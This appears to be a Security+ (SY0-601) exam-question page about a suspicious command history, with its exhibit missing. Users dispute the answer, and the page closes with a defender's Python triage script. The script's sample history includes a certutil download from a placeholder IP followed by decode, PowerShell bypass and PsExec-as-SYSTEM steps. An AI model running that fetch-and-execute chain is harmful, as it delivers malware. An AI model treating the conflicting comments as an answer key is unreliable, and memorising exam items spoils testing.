A security analyst is reviewing the following system command history on a computer that was recently utilized in a larger attack on the corporate infrastructure:
Which of the following best describes what the analyst has discovered?
A. A successful privilege escalation attack by a local user
B. A user determining what level of permissions the user has
C. A systems administrator performing routine maintenance
D. An attempt to utilize living-off-the-land binaries
These commands indicate that the user was trying to find ways to elevate their privileges using the same account or another account with higher privileges.
While they did leverage a tool that already existed on the system, the fact that they showed they had elevated their privilege at the end implies it's A. Privilege escalation.
I believe this is a privilege escalation attempt. It looks like the attacker began as domain\local user but then escalated to NT AUTHORITY\SYSTEM. NT AUTHORITY\SYSTEM is a local machine's built-in service account which runs everything from the log-in screen to most of the high-privilege background services. In my research, I read that these accounts should be whitelisted to a degree that no one can install malicious services on them.
D. An attempt to utilize living-off-the-land binaries.
Living-off-the-land binaries (LOLBins) are legitimate tools that are already present on the system, such as PowerShell, WMIC, or Certutil, that can be exploited by attackers to perform malicious activities. In this case, the attacker used the Certutil tool to download and decode a malicious file from a remote server, and then executed it using PowerShell. This technique can help the attacker bypass detection and deliver malware without relying on specific code or files.
To throw in more light, PsExec is a lightweight command-line tool for executing processes on remote systems. It can be used by attackers to run malicious processes on compromised systems. Other examples of these dual-use tools which have been used for "living off the land" attacks are Windows Sysinternals, NETSH, or SC tools.
The provided command history indicates an attempt to utilize living-off-the-land binaries (LOLBins). Living-off-the-land binaries are legitimate, built-in system tools or binaries that attackers abuse for malicious purposes. In this case, the command history shows the use of common system tools like "whoami," "net," and "tasklist" to gather information or execute commands.
upvoted 2 times
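As an added defender's example (not the question's exhibit, which is not reproduced on this page, and not code from any commenter), here is a small Python triage that labels each line of a constructed command history with the categories the comments argue over: account reconnaissance (whoami, net, tasklist), a certutil download/decode pair, PowerShell execution, and PsExec run as SYSTEM. The sample history, file names and the 203.0.113.5 address are constructed for illustration.

```python
import re

# Constructed sample command history, modelled on the chain the comments
# describe (recon -> certutil download -> decode -> execute -> PsExec -s).
SAMPLE_HISTORY = [
    "whoami",
    "whoami /priv",
    "net user",
    "net localgroup administrators",
    "tasklist /v",
    "certutil -urlcache -split -f http://203.0.113.5/update.txt update.txt",
    "certutil -decode update.txt payload.exe",
    "powershell -ExecutionPolicy Bypass -File run.ps1",
    "psexec -s -i cmd.exe",
    "whoami",
]

# Rules are checked in order; the first match wins. Patterns are anchored to
# the start of the command so a file named 'whoami.txt' does not match.
RULES = [
    ("recon", re.compile(r"^(whoami|net\s+(user|localgroup|group)|tasklist|systeminfo)\b", re.I)),
    ("lolbin_download", re.compile(r"^certutil\b.*-urlcache\b", re.I)),
    ("lolbin_decode", re.compile(r"^certutil\b.*-decode\b", re.I)),
    ("script_exec", re.compile(r"^powershell\b.*(-ExecutionPolicy\s+Bypass|-enc\w*\s)", re.I)),
    ("remote_exec_as_system", re.compile(r"^psexec\b.*\s-s\b", re.I)),
]


def classify(cmd):
    """Return the label of the first matching rule, or 'other'."""
    for label, pattern in RULES:
        if pattern.search(cmd.strip()):
            return label
    return "other"


def triage(history):
    """Summarise a command history: recon volume, LOLBin chain, SYSTEM context."""
    labels = [classify(c) for c in history]

    def first(label):  # index of first occurrence, or None
        return labels.index(label) if label in labels else None

    dl, dec, ex = first("lolbin_download"), first("lolbin_decode"), first("script_exec")
    # A chain means download, then decode, then execution, in that order.
    chain = dl is not None and dec is not None and ex is not None and dl < dec < ex
    return {
        "labels": labels,
        "recon_count": labels.count("recon"),
        "lolbin_chain": chain,
        "system_context": "remote_exec_as_system" in labels,
    }
```

The `lolbin_chain` flag is the signal that distinguishes option D from simple permission checks (option B): recon alone is ambiguous, but a certutil download followed by decode and execution is the LOLBin pattern the comments describe.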
SY0-601 Exam Questions